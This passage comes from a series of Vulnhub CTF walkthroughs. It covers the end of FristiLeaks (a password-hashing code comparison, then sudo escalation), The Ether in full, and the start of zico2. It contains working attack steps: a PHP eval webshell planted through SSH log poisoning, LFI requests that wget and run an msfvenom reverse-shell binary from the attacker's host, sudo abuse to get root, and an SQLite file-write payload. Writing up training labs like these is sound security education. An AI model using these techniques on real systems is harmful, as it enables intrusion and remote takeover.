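    """Proper storage: per-password random salt + PBKDF2-HMAC-SHA256.

    The returned string carries everything needed for verification and
    nothing that allows recovering the password.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute the hash with the stored salt and compare in constant time."""
    try:
        scheme, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def demo():
    """Decode the two values from the write-up and round-trip them.

    Returns a dict mapping each stored value to the recovered password.
    """
    stored_values = ("mVGZ3O3omkJLmy2pcuTq", "=RFn0AKnlMHMPIzpyuTI0ITG")
    recovered = {}
    for token in stored_values:
        password = cryptpass_decode(token)
        assert cryptpass_encode(password) == token   # the scheme round-trips
        recovered[token] = password
    return recovered


if __name__ == "__main__":
    for token, password in demo().items():
        print("%s -> %s" % (token, password))
    record = hash_password("LetThereBeFristi!")
    print("stored hash:", record)
    print("verify correct password:", verify_password("LetThereBeFristi!", record))
    print("verify wrong password:  ", verify_password("thisisalsopw123", record))
```
</pre><p>The decode path takes no secret input at all, which is the whole problem: the "encryption" is a fixed, public transformation, so possession of the stored value is possession of the password. With <code>hash_password</code> the stored string still lets the application verify a login, but someone who reads the file is left guessing.</p><p>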
​      <br/>
View the directory listing:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_43.jpg' alt='' referrerPolicy='no-referrer' /></p><p>View the files in the <code>.secret_admin_stuff</code> directory:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_45.jpg' alt='' referrerPolicy='no-referrer' /><br/>
This turns out to be a file owned by root,
so our permissions are presumably insufficient.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_46.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>Check the command history; the output of the <code>history</code> command:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_47.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>The <code>fristigod</code> user has been running commands through sudo.</p><p>Try the two passwords obtained earlier:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_50.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>Login succeeded:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_51.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>Use <code>sudo</code> to escalate privileges and spawn a shell:</p><p><code>sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_52.jpg' alt='' referrerPolicy='no-referrer' /><br/>
Now look directly at the files under /root.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_53.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>Read the flag file to get the flag.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_54.jpg' alt='' referrerPolicy='no-referrer' /></p><h1><a name='header-n8868' class='md-header-anchor '></a>Section 8: The Ether</h1><h2><a name='header-n8869' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n8870' class='md-header-anchor '></a>Download link</h3><p><a href='http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip' target='_blank' class='url'>http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip</a></p><h3><a name='header-n8873' class='md-header-anchor '></a>Environment</h3><ul><li>This target ships as a VMware image: download it from Vulnhub, unzip it, and run the <code>vmx</code> file.</li><li>Target: by default the VM obtains its network configuration automatically. Once started, it bridges to the physical NIC and joins the network.</li><li>Attacker: a Kali VM running in VirtualBox, also in bridged mode, can then reach the target.</li></ul><h3><a name='header-n8884' class='md-header-anchor '></a>Target notes</h3><p>This target is moderately difficult and not suitable for beginners.</p><p>The goal is to penetrate the machine and find the flag hidden in the system.</p><p>The author provides one hint: there is a file on the machine that plays an important role in the penetration, but do not waste time trying to de-obfuscate it.</p><h2><a name='header-n8891' class='md-header-anchor '></a>Information gathering</h2><ul><li>IP discovery</li></ul><p>First, check Kali's network configuration.
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277606485214.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Then discover the target with fping. <code>fping -asg 192.168.1.0/24</code> finds four live IPs on the local subnet.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277612581371.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Port scanning and service identification</li></ul><p>Scan the <code>192.168.1.0/24</code> subnet with nmap's fast-scan option (the <code>-F</code> parameter).</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277613128019.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The MAC addresses make the hosts easy to tell apart: <code>192.168.1.1</code> is a TP-Link router, <code>192.168.1.100</code> is an Apple device, and <code>192.168.1.101</code> is a VMware virtual machine. So <code>192.168.1.101</code> is the target's IP.</p><p>With the target IP confirmed, probe it in more detail with Nmap:
<code>nmap -A -v 192.168.1.101 -oN nmap.txt</code></p><p>The parameters are:</p><ul><li><code>-A</code> aggressive scan of the target IP, loading all default scripts to gather as much information as possible;</li><li><code>-v</code> show the scan progress verbosely;</li><li><code>-oN</code> write the scan results as plain text to <code>nmap.txt</code>.
The results are as follows:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277637460813.jpg' alt='' referrerPolicy='no-referrer' /></li></ul><ul><li>Threat modeling</li></ul><p>Analysing the nmap output shows that only ports <code>22</code> and <code>80</code> are open and the OS is <code>Ubuntu</code>. Port <code>22</code> is <code>SSH</code>, port <code>80</code> is <code>http</code>, and the web server is <code>Apache/2.4.18</code>.</p><p>Web applications usually have all sorts of problems, so after this initial analysis the web service is taken as the initial entry point.</p><h2><a name='header-n8939' class='md-header-anchor '></a>Web vulnerability discovery</h2><h3><a name='header-n8940' class='md-header-anchor '></a>1. Scanning with the nikto web vulnerability scanner</h3><p>Scan for web vulnerabilities with nikto: <code>nikto -h 192.168.1.101</code>, where the <code>-h</code> parameter specifies the target.
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277621096032.jpg' alt='' referrerPolicy='no-referrer' /></p><p>No obvious high-risk vulnerabilities were found; an <code>images</code> directory and an <code>/icons/README</code> file turned up, neither of much use.</p><h3><a name='header-n8946' class='md-header-anchor '></a>2. Scanning site directories with dirb</h3><p><code>dirb http://192.168.1.101</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277623420335.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Apart from some static files, nothing exploitable was found.</p><h3><a name='header-n8953' class='md-header-anchor '></a>3. Browsing the site's functionality</h3><p>The basic reconnaissance in the first two steps found no vulnerability, so visit the site manually and analyse its functions.</p><p>Clicking the <code>ABOUT US</code> link leads to the URL <code>http://192.168.1.101/?file=about.php</code>, which suggests a possible arbitrary file inclusion.</p><h3><a name='header-n8958' class='md-header-anchor '></a>4. Testing the file inclusion</h3><p>To see the test results clearly, Burp Suite is used to handle the HTTP requests.</p><p>Attempting to include Linux system configuration files shows that some restrictions are in place.</p><p>For example, including <code>/etc/passwd</code> returns nothing.
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277629489901.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Next, several common Apache log paths were tested:</p><pre class="md-fences md-end-block" lang="">/var/log/apache/access.log
/var/log/apache2/access.log
/var/www/logs/access.log
/var/log/access.log</pre><p>None returned anything.</p><p>Guessing that the configuration file path may have been changed, an attempt to read the Apache2 configuration file <code>/etc/apache2/apache2.conf</code> also failed.</p><p>Reading PHP source through the php:// filter wrapper also produced nothing.</p><p><code>file=php://filter/convert.base64-encode/resource=index.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277632154094.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Based on the file inclusion exploitation notes compiled earlier:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277635091513.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Combined with the earlier reconnaissance, the target only runs <code>http</code> and <code>ssh</code>. Since including the Apache log failed, try including the SSH login log.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277638432449.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The SSH login log is read successfully.</p><h2><a name='header-n8989' class='md-header-anchor '></a>Getting a shell</h2><h3><a name='header-n8990' class='md-header-anchor '></a>1. Getting a one-line webshell</h3><p>Log in to the target's SSH using a PHP one-liner as the username.</p><p><code>ssh '&lt;?php eval($_GET['f']); ?&gt;'@192.168.1.101</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277640398321.jpg' alt='' referrerPolicy='no-referrer' /></p><p>SSH logs this login attempt, which writes the one-liner into the SSH log file. Test whether it worked:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277643786689.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The one-liner has been written successfully.</p><h3><a name='header-n9003' class='md-header-anchor '></a>2. 
Generating a Meterpreter shell with msfvenom</h3><p>Since Msf is what I use most often, it is the main tool for the rest of this penetration.</p><p>First generate a Linux shell binary.</p><p><code>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f elf > shell.elf</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277683325190.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9012' class='md-header-anchor '></a>3. Setting up the Metasploit listener</h3><pre class="md-fences md-end-block" lang="">use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.1.102
exploit</pre><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277699437724.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9016' class='md-header-anchor '></a>4. Planting the Meterpreter shell</h3><p>First start a simple web server with Python: <code>python -m SimpleHTTPServer 80</code></p><p>Then use the one-liner obtained earlier to execute commands that download the generated payload and run it.</p><p>Send the following requests in turn:</p><ol start='' ><li><code>/?file=/var/log/auth.log&f=system('wget+192.168.1.102/shell.elf')%3b</code></li><li><code>/?file=/var/log/auth.log&f=system('chmod+%2bx+shell.elf')%3b</code></li><li><code>/?file=/var/log/auth.log&f=system('./shell.elf')%3b</code></li></ol><p>Notes:</p><ol start='' ><li>Because the commands contain spaces, plus signs and other special characters, the payload must be URL-encoded before it will execute correctly.</li><li>The generated payload file has no execute permission, so it cannot run after being downloaded to the target; <code>shell.elf</code> must be given execute permission first and then run.</li></ol><p>Execution result:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277699964066.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Output of the web server and msf:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277706402332.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9052' class='md-header-anchor '></a>Privilege escalation</h2><p>The basic approach to Linux privilege escalation:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277780553156.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9057' class='md-header-anchor '></a>1. 
Kernel exploit</h3><p>With a Meterpreter shell on the target, take a quick look at the system information.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277711519803.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The system is <code>Ubuntu 16.04 (Linux 4.10.0-40-generic)</code>. A privilege escalation exploit for Ubuntu 16.04 was published a while ago, so try it here.</p><p>Exploit URL: <a href='https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c' target='_blank' class='url'>https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c</a></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277744279712.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Privilege escalation failed.</p><h3><a name='header-n9070' class='md-header-anchor '></a>2. Privilege escalation with msf</h3><p><code>use post/multi/recon/local_exploit_suggester</code></p><p>No usable privilege escalation vulnerability was found.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277748088090.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9079' class='md-header-anchor '></a>3. Privilege escalation via a misconfigured SUID file</h3><p>Enter the interactive shell and spawn a bash shell:
<code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p>In the web directory there is a file <code>xxxlogauditorxxx.py</code> that should not be there; it is presumably the special file mentioned in the challenge description, and it is unusually large.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277741330578.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Running the Python file shows that it is a log auditing program.
It reads the Apache2 log file by executing the <code>cat</code> command, but the command fails because of insufficient permissions.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277716185341.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Looking closely at the file's permissions, it has the SUID bit set and is owned by root.</p><p>Check the user's sudo rights with <code>sudo --list</code>.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277721141332.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The Python file can be run as root without a password, which makes things much easier.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277722533145.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The misconfiguration of this Python file makes it possible to execute commands directly as root.</p><p>Next, get a root shell.</p><h3><a name='header-n9106' class='md-header-anchor '></a>4. Getting a root shell</h3><p>Since the msfvenom payload has already been uploaded, reuse it. First exit the <code>shell</code>, send the session to the background with the <code>background</code> command, then start the listener again and put it in the background too.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277724353655.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Use the special file to run the msf payload as root.</p><pre class="md-fences md-end-block" lang="">sudo ./xxxlogauditorxxx.py
/var/log/apache2/access.log|./shell.elf</pre><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277726121084.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Running the Python file reports a problem, but that does not stop the payload from running.</p><p>Enter the shell of session 2 and check privileges:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277727104925.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9122' class='md-header-anchor '></a>Getting the flag</h2><p>A <code>flag.png</code> file is found in root's home directory:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729121417.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Download it for local analysis:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729313511.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729611404.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The next challenge appears to be image steganography.</p><p>Analysis finds a base64 string at the end of the image file.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277730366648.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Write the base64 into <code>flag.txt</code> and decode it to get the flag:</p><p><code>cat flag.txt | base64 -d</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277731880443.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9145' class='md-header-anchor '></a>Review of the approach</h2><p>With the final goal reached, let's go back and analyse the earlier failures.</p><h3><a name='header-n9148' class='md-header-anchor '></a>1. Why the web-side attempts failed</h3><p>First look at the core code of index.php:</p><pre class="md-fences md-end-block" lang="" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">&lt;?php</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span 
role="presentation" style="padding-right: 0.1px;">$file = $_GET["file"];</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("etc","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("php:","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("expect:","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("data:","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("proc","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("home","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("opt","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">if ($file == "/var/log/auth.log") {</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">header("location: index.php");</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">}</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;">else{</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">include($file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">}</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">include($file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">?></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 468px;"></div><div class="CodeMirror-gutters" style="display: none; height: 498px;"></div></div></div></pre><p>可以看到<code>index.php</code>将一些关键词置空了。</p><p>所以,之前利用不成功的点原因如下:</p><ul><li>伪协议读文件失败</li></ul><p>过滤了<code>php:</code>且大小写敏感,故不能使用伪协议读文件。</p><ul><li>读取配置文件、passwd文件等失败</li></ul><p>过滤了<code>etc</code>,无法读取任何配置文件</p><ul><li>读取Apache访问日志失败。</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277739100061.jpg' alt='' referrerPolicy='no-referrer' /></p><p>因权限问题,<code>www-data</code>用户无法写入和读取Apache的日志文件。故,包含Apache日志失败。</p><h3><a name='header-n9176' class='md-header-anchor '></a>2. 
Why the system-side exploitation failed</h3><ul><li>Kernel exploit privilege escalation failed</li></ul><p>From the error messages, the likely cause is that the target is a 32-bit system while the exploit only supports 64-bit systems.</p><h2><a name='header-n9183' class='md-header-anchor '></a>Summary of the approach</h2><p>Breakthrough points:</p><ol start='' ><li>Finding the PHP local file inclusion vulnerability</li><li>Writing a one-line web shell into the SSH log</li><li>Getting a shell by combining the LFI with the SSH log</li><li>Generating a payload with MSF, then planting and running it through the one-liner</li><li>Escalating privileges through the misconfigured root-owned script runnable via sudo</li></ol><p>There is room for other approaches along the way, for example:</p><ol start='' ><li>With the file inclusion vulnerability, fuzz for configuration files with a wordlist.</li><li>Get a reverse shell with nc or another reverse-shell technique.</li></ol><p>Metasploit Framework also has many convenient features; mastering them greatly simplifies some steps of a penetration test and is worth studying in depth.</p><p>Overall, this target is fairly simple: one web service and one SSH service, so the exploitation points are limited to those two and the path is clear, which makes it easy for practitioners to complete.</p><h1><a name='header-n9215' class='md-header-anchor '></a>Section 9: zico2</h1><h2><a name='header-n9217' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n9218' class='md-header-anchor '></a>Download link</h3><p> <a href='https://download.vulnhub.com/zico/zico2.ova' target='_blank' class='url'>https://download.vulnhub.com/zico/zico2.ova</a></p><h3><a name='header-n9221' class='md-header-anchor '></a>Environment</h3><ul><li>The target is provided as an OVA image and the author recommends VirtualBox; download it from Vulnhub and import it into VirtualBox to run it.</li><li>Target: set the VM's network adapter to bridged mode.</li><li>Attacker: a Kali VM, also in bridged mode, can then reach the target.</li></ul><h3><a name='header-n9232' class='md-header-anchor '></a>Target description</h3><p>Difficulty: intermediate.</p><p>Objective: get into the machine, obtain root and read the flag file.</p><p>The author gives one hint: enumerate, enumerate, enumerate.</p><h2><a name='header-n9239' class='md-header-anchor '></a>Information gathering</h2><ul><li><p>Finding the IP</p><p>First check Kali's network configuration.
  <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307852282391.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Then discover the target with nmap. <code>nmap -sP 192.168.1.0/24</code> (<code>-sP</code> is the old spelling of <code>-sn</code>, a ping sweep) finds four relevant IPs on the segment.</p><p> <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307852529644.jpg' alt='' referrerPolicy='no-referrer' /></p></li><li><p>Port scanning and service identification</p><p>Scan the <code>192.168.1.0/24</code> segment with nmap's fast-scan option (<code>-F</code>, the 100 most common ports)</p><p> <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307853380399.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The <code>MAC</code> address vendor makes it obvious: <code>192.168.1.3</code> is the VM running in VirtualBox, i.e. the target we set up.</p><p>With the target IP confirmed, probe it in more detail with Nmap:
<code>nmap -A -v 192.168.1.3 -oN nmap.txt</code></p><p>The parameters:</p><ul><li><code>-A</code> aggressive scan: OS detection, version detection, the default script set and traceroute, to gather as much as possible;</li><li><code>-v</code> verbose output while scanning;</li><li><code>-oN</code> write the results as plain text to <code>nmap.txt</code>.
The result:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307855078046.jpg' alt='' referrerPolicy='no-referrer' /></li></ul></li></ul><ul><li><p>Threat modeling</p><p>The nmap results show that the target has ports <code>22</code>, <code>80</code> and <code>111</code> open and runs <code>Linux</code>. Port <code>22</code> is <code>SSH</code>; port <code>80</code> is <code>http</code>, served by <code>Apache/2.2.22</code>.</p><p>Web applications usually have all sorts of problems, so after this first look the web service is chosen as the initial entry point.</p></li></ul><h2><a name='header-n9286' class='md-header-anchor '></a>Web vulnerability discovery</h2><h3><a name='header-n9287' class='md-header-anchor '></a>1. Scanning the site's directories with dirb</h3><p><code>dirb http://192.168.1.3</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307858659578.jpg' alt='' referrerPolicy='no-referrer' /></p><p>A sensitive directory, <code>dbadmin</code>, is found</p><h3><a name='header-n9294' class='md-header-anchor '></a>2. Directory listing</h3><p>Opening <code>http://192.168.1.3/dbadmin/</code> shows a directory listing, which reveals a <code>test_db.php</code> file.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307859615079.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9299' class='md-header-anchor '></a>3. Weak password</h3><p><code>http://192.168.1.3/dbadmin/test_db.php</code> turns out to be a web database manager in the style of phpMyAdmin for MySQL; here it is phpLiteAdmin, the web front end for SQLite.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307860283151.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The weak password <code>admin</code> gets us in.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307865109650.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9308' class='md-header-anchor '></a>4. Information gathering in phpLiteAdmin</h3><p>The existing database contains two accounts; their password hashes were looked up on somd5.com (an online MD5 lookup service).</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307883468354.jpg' alt='' referrerPolicy='no-referrer' /></p><p>This gives:</p><pre class="md-fences md-end-block" lang="">root 34kroot34
zico zico2215@</pre><h3><a name='header-n9316' class='md-header-anchor '></a>5. File inclusion vulnerability</h3><p>Browsing the site's features reveals a link of the form <a href='http://192.168.1.3/view.php?page=tools.html' target='_blank' class='url'>http://192.168.1.3/view.php?page=tools.html</a></p><p>This suggests a file inclusion vulnerability. After some attempts, the Linux passwd file can be included successfully.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307882619884.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9323' class='md-header-anchor '></a>Getting a web shell</h2><h3><a name='header-n9324' class='md-header-anchor '></a>1. Attempt: getting a shell by creating a new database</h3><p>SQLite is common in embedded devices; it is a single-file database, similar to Access. The idea is to create a database named <code>shell.php</code>, which would produce a file called shell.php on disk. But the database files live under <code>/usr/databases/test_users</code></p><p>So try creating a database named <code>../../var/www/html/shell.php</code>.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307866554332.jpg' alt='' referrerPolicy='no-referrer' /></p><p>It is created, but <code>/</code> is filtered out of the name. This method fails, but it is noted here as a potential breakthrough point.</p><h3><a name='header-n9335' class='md-header-anchor '></a>2. Attempt: getting a shell by writing a file from SQL</h3><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307867627327.jpg' alt='' referrerPolicy='no-referrer' /></p><p>payload: <code>ATTACH DATABASE '/var/www/html/shell.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('&lt;?php phpinfo();?&gt;');</code></p><p>Writing a file this way works when:</p><ol start='' ><li>SQL statements can be run directly against the database.</li><li>Stacked queries are enabled (off by default)</li></ol><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307875215505.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Execution fails, so this point is abandoned.</p><h3><a name='header-n9353' class='md-header-anchor '></a>3. Getting a shell with phpLiteAdmin and the file inclusion vulnerability</h3><p>The earlier attempts found a file inclusion vulnerability and write access to the database. Combining the two yields a shell:</p><ol start='' ><li>Add a row through phpLiteAdmin whose content is PHP code, so that it is written into the database file.</li><li>Include the database file through the file inclusion vulnerability to get a shell.</li></ol><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307890668345.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307891213556.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9371' class='md-header-anchor '></a>4. Planting a Meterpreter shell</h3><p>First generate an msf executable payload. <code>LHOST</code> is the address the reverse shell connects back to, i.e. Kali (<code>192.168.1.4</code>, the host the payload is fetched from below), not the target:</p><p><code>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 -f elf &gt; ~/Desktop/msf.elf</code></p><p><img 